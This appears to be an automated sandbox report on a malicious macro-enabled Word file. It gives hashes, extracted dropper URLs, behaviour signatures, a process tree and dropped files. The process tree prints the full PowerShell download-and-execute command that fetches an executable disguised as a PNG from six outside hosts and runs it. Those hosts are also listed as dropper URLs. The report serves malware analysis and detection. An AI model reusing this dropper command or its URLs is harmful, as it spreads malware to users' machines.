Analysis

  • max time kernel
    118s
  • max time network
    110s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 03:38

General

  • Target

    13_08_2020_62967988.docm

  • Size

    381KB

  • MD5

    3d52b1e551984e203f02d9dcbd8e7e8b

  • SHA1

    369dbac4370c025651892ce036dbfd82fbbb4ef2

  • SHA256

    37a4488c88924394c225a530ace9dc09a4507d913bea46c49ce14ff43b40f6b8

  • SHA512

    7ad63084e0c51727866c784b31bf3a77ea68b28b061327b2e8f8e39e6e2834f77aa69a9922294ca362fa5b4b695762e9fa3c28b1bf2584be9611102e21008e53

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://podosenengk12.com/rtjyw/555555.png

exe.dropper

http://accent-granit.com/urjikh/555555.png

exe.dropper

http://wisedata.technology/xhpcvntvdmj/555555.png

exe.dropper

http://kahnamoei.com/vatopbv/555555.png

exe.dropper

http://carpalette-hachinohe.com/pdfdxenf/555555.png

exe.dropper

http://jung-versand.net/dbjqzkp/555555.png

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\13_08_2020_62967988.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1880
    • C:\Windows\SysWOW64\explorer.exe
      explorer.exe C:\ProgramData\Portes.vbs
      2⤵
      • Process spawned unexpected child process
      PID:1708
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Portes.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:268
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\Nipo_Bik\Jorticks.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1556
        • C:\Windows\system32\taskkill.exe
          Taskkill /IM "winword.exe" /F
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1984
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell Foreach($url in @('http://podosenengk12.com/rtjyw/555555.png','http://accent-granit.com/urjikh/555555.png','http://wisedata.technology/xhpcvntvdmj/555555.png','http://kahnamoei.com/vatopbv/555555.png','http://carpalette-hachinohe.com/pdfdxenf/555555.png','http://jung-versand.net/dbjqzkp/555555.png')) { try{$path = 'C:\Nipo_Bik\Loterios.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1528
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 10
          4⤵
          • Delays execution with timeout.exe
          PID:604

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Nipo_Bik\Jorticks.cmd
    Filesize

    5KB

    MD5

    a0b5cf22bd560df98fbf461a798ec8b7

    SHA1

    e3d2a155cbeeefb366f9f872f1486f4c0016bc29

    SHA256

    a1a58a129f0893b4cdf8dec2616e00727a1d247d13fbcf0b9f1ca573a5aa4ccb

    SHA512

    f7972aad3d643c243ebabba26fc769ed17c68a0dd2d12b1cfddce80014e857b501b3f27118a3aa06565c5b984a82f65a1a4dfa9333f4020a7b7cea5b9c437947

  • C:\ProgramData\Kerpok.vbs
    Filesize

    1008B

    MD5

    75b9911265592c7b70e5cc29bc065b61

    SHA1

    0a54d7d0923e80e37448e31ae9481e860318be6c

    SHA256

    26c6a8e9ae7ce442c94e85ead16f2fa1d733fa0a917a5e40ca03bf1b2973ac50

    SHA512

    f2d2096ad1f4a5b9c661130fd66cdac1a4d451889a035cfc89527d8cdd41e6bcc8b83585a80210c61b65e13ee8f2cfa108c3c14cdc36f429b1160d7b4c2050dc

  • C:\ProgramData\Portes.vbs
    Filesize

    68KB

    MD5

    dc1b5ee521257fc500fefc81e88ccb9d

    SHA1

    42c9a2009e1fcae7de8cb50bd62fb3527b826cf9

    SHA256

    02c28308ba9e17827cabb90d9c92684658c01a52ac90106555e8d46e7fe9f696

    SHA512

    33c4dd9bf6afd01e822cadb08b4dd4bed8a7714ca68f342fdcfca345dfa3eb2fd0b5a4ccef70844d93e76eb7da549995ff98e9969e78b147c383bcbf92c24290

  • memory/268-64-0x0000000000000000-mapping.dmp
  • memory/604-75-0x0000000000000000-mapping.dmp
  • memory/1528-74-0x000000000256B000-0x000000000258A000-memory.dmp
    Filesize

    124KB

  • memory/1528-72-0x000007FEF2CC0000-0x000007FEF381D000-memory.dmp
    Filesize

    11.4MB

  • memory/1528-73-0x0000000002564000-0x0000000002567000-memory.dmp
    Filesize

    12KB

  • memory/1528-70-0x0000000000000000-mapping.dmp
  • memory/1556-67-0x0000000000000000-mapping.dmp
  • memory/1708-59-0x0000000000000000-mapping.dmp
  • memory/1708-61-0x000000006AA01000-0x000000006AA03000-memory.dmp
    Filesize

    8KB

  • memory/1880-65-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1880-54-0x0000000072201000-0x0000000072204000-memory.dmp
    Filesize

    12KB

  • memory/1880-58-0x0000000070C6D000-0x0000000070C78000-memory.dmp
    Filesize

    44KB

  • memory/1880-57-0x00000000755A1000-0x00000000755A3000-memory.dmp
    Filesize

    8KB

  • memory/1880-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1880-55-0x000000006FC81000-0x000000006FC83000-memory.dmp
    Filesize

    8KB

  • memory/1960-62-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp
    Filesize

    8KB

  • memory/1984-69-0x0000000000000000-mapping.dmp